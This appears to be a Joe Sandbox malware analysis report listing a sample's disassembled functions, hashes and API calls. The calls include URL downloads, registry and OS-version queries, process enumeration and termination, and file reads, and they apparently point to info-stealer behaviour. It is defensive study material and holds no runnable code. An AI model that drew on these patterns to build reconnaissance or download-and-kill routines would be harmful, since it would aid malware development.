                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 1170836740-1018135373
                                  • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction ID: 2f3fee52e6bb3bb9ffdd745064dec27f481376e0203b5fb1ca6caa3372362b41
                                  • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                  • Instruction Fuzzy Hash: 8141B530900119DBCF11DF68C884A9E7BB5FF45325F148165EE18EB392D7319909CF92
                                  Function 007E5000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007E501A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007E5021
                                  • InternetOpenA.WININET(00800DE3,00000000,00000000,00000000,00000000), ref: 007E503A
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 007E5061
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 007E5091
                                  • InternetCloseHandle.WININET(?), ref: 007E5109
                                  • InternetCloseHandle.WININET(?), ref: 007E5116
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                  • String ID:
                                  • API String ID: 3066467675-0
                                  • Opcode ID: a7395e2ef5997ee6243cfcd364b4c8d27c157c65ce63a525df7e561c807b4b67
                                  • Instruction ID: f2ad0075e844a32ef9f16f92606da8f4c14f224f86cb1bcea949f4e1ac0cb101
                                  • Opcode Fuzzy Hash: a7395e2ef5997ee6243cfcd364b4c8d27c157c65ce63a525df7e561c807b4b67
                                  • Instruction Fuzzy Hash: 4C31FDB4A4421CABDB20DF94DC85BDDB7B4AB48304F1081D8F709A7291D7B46AC58F68
                                  Function 007F856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007F85B6
                                  • wsprintfA.USER32 ref: 007F85E9
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007F860B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F861C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8629
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D830,00000000,000F003F,?,00000400), ref: 007F867C
                                  • lstrlen.KERNEL32(?), ref: 007F8691
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D860,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00800B3C), ref: 007F8729
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F8798
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F87AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 7b4768a1578e39df2f6dc347c74fb4b0917ab39569237236ce81e4cbc224890a
                                  • Instruction ID: 3b7fa051de1aca684a699d4332e5b051eff5246f42a0b4ad12f9cc82306c76a5
                                  • Opcode Fuzzy Hash: 7b4768a1578e39df2f6dc347c74fb4b0917ab39569237236ce81e4cbc224890a
                                  • Instruction Fuzzy Hash: B6212C7191021CABDB64DB94DC85FE9B3B8FB48700F00C1D8E609A6291DF756A85CFE4
                                  Function 007F99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F99C5
                                  • Process32First.KERNEL32(007EA056,00000128), ref: 007F99D9
                                  • Process32Next.KERNEL32(007EA056,00000128), ref: 007F99F2
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F9A4E
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9A6C
                                  • CloseHandle.KERNEL32(00000000), ref: 007F9A79
                                  • CloseHandle.KERNEL32(007EA056), ref: 007F9A88
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: dfe7bf6f442f9b72dbe338b0d893bb85241f5cd7a2ea4005e95fa49af0785f58
                                  • Instruction ID: d7d04a4d7b39d1b6af1f9f81e69afffe0535c9e410e5ad0f72772513216df41f
                                  • Opcode Fuzzy Hash: dfe7bf6f442f9b72dbe338b0d893bb85241f5cd7a2ea4005e95fa49af0785f58
                                  • Instruction Fuzzy Hash: E9210371904218EBDB25DF95DC88BEDB7B5BB48300F1082C8E609A72A0D7759F85CF50
                                  Function 007F7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F7834
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F783B
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BBD0,00000000,00020119,00000000), ref: 007F786D
                                  • RegQueryValueExA.ADVAPI32(00000000,0145D9E0,00000000,00000000,?,000000FF), ref: 007F788E
                                  • RegCloseKey.ADVAPI32(00000000), ref: 007F7898
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: Windows 11
                                  • API String ID: 3225020163-2517555085
                                  • Opcode ID: 3e5b30b3747361cc63044998eac44cbc704b518ba50fc417af960b85673ab572
                                  • Instruction ID: f8e97937a79f88da034ef39444135af040876ae6d3529f79af509212124f7a7b
                                  • Opcode Fuzzy Hash: 3e5b30b3747361cc63044998eac44cbc704b518ba50fc417af960b85673ab572
                                  • Instruction Fuzzy Hash: DD01F475A44309BBEB04DBE4ED49FAD7778EB48700F104254F705A72A1D6B49901DB60
                                  Function 007F78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007F78C4
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F78CB
                                  • RegOpenKeyExA.ADVAPI32(80000002,0144BBD0,00000000,00020119,007F7849), ref: 007F78EB
                                  • RegQueryValueExA.ADVAPI32(007F7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 007F790A
                                  • RegCloseKey.ADVAPI32(007F7849), ref: 007F7914
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3225020163-1022791448
                                  • Opcode ID: c42fec733e37125f4290e0adeac503aff0d2547e96700ded1535e89503cdd10a
                                  • Instruction ID: 0aa9903ecbc7130e904ce16d2482082d933eb986796d269112c1206736e1035b
                                  • Opcode Fuzzy Hash: c42fec733e37125f4290e0adeac503aff0d2547e96700ded1535e89503cdd10a
                                  • Instruction Fuzzy Hash: EB01F4B5A44309BFDB00DBE4DC49FAE7778EB48700F104694F615A6392D7B46A11CBA1
                                  Function 007F4300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 007F4325
                                  • RegOpenKeyExA.ADVAPI32(80000001,0145D478,00000000,00020119,?), ref: 007F4344
                                  • RegQueryValueExA.ADVAPI32(?,0145DC80,00000000,00000000,00000000,000000FF), ref: 007F4368
                                  • RegCloseKey.ADVAPI32(?), ref: 007F4372
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F4397
                                  • lstrcat.KERNEL32(?,0145DD88), ref: 007F43AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID:
                                  • API String ID: 2623679115-0
                                  • Opcode ID: 4f008368aab4163b726eb4813e34aca241619d8a1d2142387619bf8aaac86f73
                                  • Instruction ID: 3eec1753991b64b21e81e504c126af9751b4c792aef5f291fdb6385735a3c60b
                                  • Opcode Fuzzy Hash: 4f008368aab4163b726eb4813e34aca241619d8a1d2142387619bf8aaac86f73
                                  • Instruction Fuzzy Hash: 35419CB6900108ABDF14EBE0EC5BFFE737CAB8C700F404658B72556192EE7956988BD1
                                  Function 007EA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007EA13C
                                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 007EA161
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 007EA181
                                  • ReadFile.KERNEL32(000000FF,?,00000000,007E148F,00000000), ref: 007EA1AA
                                  • LocalFree.KERNEL32(007E148F), ref: 007EA1E0
                                  • CloseHandle.KERNEL32(000000FF), ref: 007EA1EA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 2311089104-0
                                  • Opcode ID: e7fb13e0c63965e94eaf219901a54352b4f87506efa8a150eb1245abe729a7d5
                                  • Instruction ID: 55ae5116c1778485161105984157f042ba2d619730a627efb8ca2e6eeffd2859
                                  • Opcode Fuzzy Hash: e7fb13e0c63965e94eaf219901a54352b4f87506efa8a150eb1245abe729a7d5
                                  • Instruction Fuzzy Hash: 98310DB4A0520DEFDB14CFA5D885BEE77B5BF48300F108158E911A7390D778AA81CFA1
                                  Function 007FCB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Typememset
                                  • String ID:
                                  • API String ID: 3530896902-3916222277
                                  • Opcode ID: e62e1a84e1f551b960e7d541197ae80aaa5ca7e7d101e7ab7d2848895b312ce2
                                  • Instruction ID: 25453f949099c9ac2564f2bcc871e8fe8352eb4212ea4b44c20f136786e57b9b
                                  • Opcode Fuzzy Hash: e62e1a84e1f551b960e7d541197ae80aaa5ca7e7d101e7ab7d2848895b312ce2
                                  • Instruction Fuzzy Hash: 524119B110079C9EDB328B24CD95FFB7BECAB45704F1444E8DA8A97242E2759A44DF70
                                  Function 007F49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,0145DD10), ref: 007F4A2B
                                    • Part of subcall function 007F8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007F8F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007F4A51
                                  • lstrcat.KERNEL32(?,?), ref: 007F4A70
                                  • lstrcat.KERNEL32(?,?), ref: 007F4A84
                                  • lstrcat.KERNEL32(?,0144B1F8), ref: 007F4A97
                                  • lstrcat.KERNEL32(?,?), ref: 007F4AAB
                                  • lstrcat.KERNEL32(?,0145D738), ref: 007F4ABF
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F8F20: GetFileAttributesA.KERNEL32(00000000,?,007E1B94,?,?,0080577C,?,?,00800E22), ref: 007F8F2F
                                    • Part of subcall function 007F47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007F47D0
                                    • Part of subcall function 007F47C0: RtlAllocateHeap.NTDLL(00000000), ref: 007F47D7
                                    • Part of subcall function 007F47C0: wsprintfA.USER32 ref: 007F47F6
                                    • Part of subcall function 007F47C0: FindFirstFileA.KERNEL32(?,?), ref: 007F480D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
